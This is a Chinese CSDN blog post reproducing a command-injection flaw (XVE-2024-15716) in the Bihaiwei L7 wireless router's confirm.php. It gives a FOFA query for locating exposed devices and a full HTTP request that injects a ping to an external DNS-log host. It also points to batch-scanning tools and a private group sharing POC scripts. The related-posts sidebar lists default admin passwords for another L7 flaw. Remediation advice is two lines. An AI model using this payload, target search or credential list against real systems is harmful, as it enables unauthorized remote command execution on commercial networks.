【漏洞复现】碧海威L7云路由无线运营版 confirm.php命令注入漏洞复现(XVE-2024-15716)

已于 2024-06-27 22:38:14 修改
阅读量373 收藏 3
点赞数 11
分类专栏: 漏洞复现篇 文章标签: 碧海威L7 RCE
于 2024-06-27 22:33:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140025842
版权

0x01 产品简介

碧海威L7网络设备是 北京智慧云巅科技有限公司下的产品,基于国产化ARM硬件平台,采用软硬一体协同设计方案,释放出产品最大效能,具有高性能,高扩展,产品性能强劲,具备万兆吞吐能力,支持上万用户同时在线等高性能。其采用简单清晰的可视化WEB管理界面,支持最新HTML5,方便移动设备访问管理,分级别多层次管理模块,使用简单,维护方便;设备状况、网络流量一目了然,一键备份/恢复,让网络管理更简单。是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备,具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。

0x02 漏洞概述

碧海威L7 confirm.php接口处存在RCE漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。

0x03 搜索语法

app="碧海威科技-L7云路由"

在这里插入图片描述

0x04 漏洞复现

GET /notice/confirm.php?t=;ping%20xfkxbcjeee.dgrh3.cn HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在这里插入图片描述
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

关闭互联网暴露面或接口设置访问权限
升级至安全版本

SuperherRo
关注
  • 11
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现碧海L7多款网络产品后台命令执行漏洞
晚风不及你
01-31 676
碧海L7网络产品是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备。设备具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。
碧海 L7多款产品 后台命令执行漏洞
千寻的博客
05-14 1021
文章目录漏洞名称漏洞描述影响本fofa漏洞步骤摘抄 漏洞名称 碧海 L7多款产品 后台命令执行漏洞 漏洞描述 碧海 L7多款产品存在 后台命令执行漏洞, 攻击者通过账号密码登录后台后(默认密码为 adimn/admin or admin123) 通过命令拼接造成命令注入(漏洞存在于 命令控制台中,其中存在命令注入) 影响碧海 L7多款产品 fofa “碧海漏洞步骤 第一步 访问主页 第二步是要默认登录 默认密码为 adimn/admin or admin123 第三步
JetBrains TeamCity 身份验证绕过漏洞复现(CVE-2024-27198)
0xSec
03-05 1659
JetBrains TeamCity发布新本修复了两个高危漏洞JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)与JetBrains TeamCity 路径遍历漏洞(CVE-2024-27199)。未经身份验证的远程攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。远程攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2544
vulhub-spring漏洞复现
漏洞复现-通达OA】通达OA前台任意用户登录漏洞
xiaokp7的博客
06-18 2262
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)
qq_53003652的博客
10-16 1899
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。Atlassian Confluence是企业广泛使用的wiki系统。nuclei已上线该yaml (CVE-2023-22515)此时用户已经创建完毕,登录。
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
Openfire身份认证绕过漏洞复现+利用(CVE-2023-32315)
0xSec
06-15 8569
Openfire的管理控制台是一个基于 Web 的应用程序,被发现可以使用路径遍历的方式绕过权限校验。成功利用后,未经身份验证的用户可以访问 Openfire 管理控制台中的后台页面。同时由于Openfire管理控制台的后台提供了安装插件的功能,所以攻击者可以通过安装恶意插件达成远程代码执行的效果。
网络安全之命令执行漏洞复现
kali_Ma的博客
11-15 2927
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。在本1.997之前的Webmin中存在一个任意命令注入漏洞,触发该漏洞需登录Webmin。
jquery-confirm.rar
08-22
jquery-confirm 消息弹出框插件的使用,有详细的注释,可以直接使用
elementUI vue this.$confirm 和el-dialog 弹出框 移动 示例demo
10-16
主要介绍了elementUI vue this.$confirm 和el-dialog 弹出框 移动 示例demo,本文通过实例代码给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
medium-style-confirm:medium.com样式确认对话框
05-16
中等风格的确认演示@ 用法mscConfirm(title, okCallback) : mscConfirm ( "Delete?" , function ( ) { alert ( "Post deleted" ) ;} ) ; mscConfirm(title, subheading, okCallback&#...
jquery-confirm.js和jquery-form.js
03-21
form表单提交验证调转,jquery-confirm插件,弹出提醒框................
网狐游戏参考-服务器架设指南.doc
06-29
服务器
智慧农业产业园区信息化建设方案.zip
06-29
智慧农业产业园区信息化建设方案.zip
编程实战:基于JAVA的在线考试管理系统(源代码+文档+开题报告+外文翻译+英文文献+答辩PPT).zip
06-29
摘要: 3 Abstract: 4 1 引言 5 2 在线考试系统构架 5 2.1 在线考试系统一般需求分析 5 2.2 当前在线考试系统现状分析 6 2.3 基于J2EE的在线考试系统架构介绍及拥有的优势 6 2.3.1 结构总体介绍 6 2.3.2 客户层组件 7 2.3.2.1 Applets 7 2.3.2.2 应用程序客户端 7 2.3.3 WEB层组件 7 2.3.4 业务层组件 7 2.3.5 企业信息系统层 8 2.3.6 J2EE架构的优势 8 2.3.7 Visual Basic .NET 4 2.3.8 SQL Server 2000 5 2.39 Web服务 5 2.4.0 Web服务的概念 5 2.4.1 Web服务的优点 6 2.4.4NET对Web服务的支持 6 2.4.3 考试系统的运行平台 6 2.4.4 硬件平台 6 2.4.5 软件平台 6 第三章 考试系统的数据库设计、构成模块及特点 7 3.1 考试系统的数据库设计 7 3.2考试系统的构成模块 9 3 测试系统具体设计 9 3.1 基于J2EE的E-nettest在线考试系统构架概要 9
DNS-服务器的配置实验报告.doc
06-29
服务器、电脑、
1 (3).pptx
最新发布
06-29
商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板商务风ppt模板
这样设置并不生效,仍然会被下面这个属性替代:.ant-modal.custom-modal.ant-confirm-confirm .ant-modal-content .ant-modal-body .ant-confirm-body-wrapper .ant-confirm-btns .ant-btn
06-09
如果你的自定义样式无法覆盖默认样式,你可以使用 `!important` 规则来强制应用自定义样式。例如: ``` import { Modal, Button } from 'antd'; Modal.confirm({ className: 'custom-modal', title: window.language['playlist.tip'], content: window.language['playlist.des5'], okButtonProps: { style: { width: '100px', height: '50px', }, className: 'custom-ok-button', }, cancelButtonProps: { style: { width: '120px', height: '50px', }, className: 'custom-cancel-button', }, onOk: () => { // 确认操作 }, onCancel: () => { // 取消操作 }, }); ``` 然后在你的 CSS 文件中添加以下代码: ``` .custom-modal .custom-ok-button { width: 100px !important; height: 50px !important; } .custom-modal .custom-cancel-button { width: 120px !important; height: 50px !important; } ``` 这样就可以强制应用自定义样式了。如果你仍然无法覆盖默认样式,你可以使用更具体的 CSS 选择器来定位元素并应用自定义样式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值